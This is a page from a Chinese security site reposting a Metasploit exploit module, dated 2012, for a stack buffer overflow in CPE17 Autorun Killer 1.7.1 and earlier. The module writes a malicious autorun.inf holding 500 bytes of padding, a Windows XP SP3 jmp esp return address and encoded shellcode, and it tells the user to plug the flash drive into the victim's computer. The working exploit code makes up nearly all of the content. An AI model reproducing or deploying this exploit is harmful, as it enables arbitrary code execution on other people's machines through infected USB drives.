首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow Exploit
来源:http://www.metasploit.com 作者:Xelenonz 发布时间:2012-04-28  

#
# CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit
# by Xelenonz

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::FILEFORMAT

      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit',
                        'Description'    => %q{
                                        readfile function is vulnerable it can be overflow 
                                             },
                        'Author'         => [ 'Xelenonz' ],
                        'Version'        => '0.1',
                       
                        'Payload'        =>
                                {
                                        'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' => {'BufferRegister'=>'ECX'},
                                },
   'DefaultOptions' =>
                    {
                       'DisablePayloadHandler' => 'true',
                    },
                        'Platform'       => 'windows',

                        'Targets'        =>
                                [
                                        [
                                         'Windows XP SP3',
                                            {  'Ret' => 0x775a676f,
                                             'Offset' => 500
                                            }
                                       ],
                                     
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false
                        ))

                        register_options(
                        [
                         OptString.new('FILENAME',   [ true, 'The file name.',  'autorun.inf']),
                        ], self.class)
       end

       def exploit
          print_status("Encoding Payload ...")
          enc = framework.encoders.create("x86/alpha_mixed")
    enc.datastore.import_options_from_hash( {'BufferRegister'=>'ESP'} )
    hunter = enc.encode(payload.encoded, nil, nil, platform)
    buffer = ""
          buffer << "A"*target['Offset'] # padding offset
          buffer << [target.ret].pack('V') # jmp esp
          buffer << hunter # shellcode
          print_status("Creating '#{datastore['FILENAME']}' file ...")
          file_create(buffer)
          print_status("Plug flashdrive to victim's computer")
          handler
         
       end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Discuz! X2.5 远程代码执行漏洞
·Nokia PC Suite Video Manager 7
·Parallels PLESK 9.x Insecure P
·Mikrotik's Winbox Remote Code
·MoroccoTel Box Default Open Te
·WebCalendar 1.2.4 Pre-Auth Rem
·mount.cifs chdir() Arbitrary r
·Remote-Anything Player 5.60.15
·McAfee Virtual Technician 6.3.
·Shadow Stream Recorder 3.0.1.7
·SAMSUNG NET-i Viewer 1.37 SEH
·MS12-027 MSCOMCTL ActiveX Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved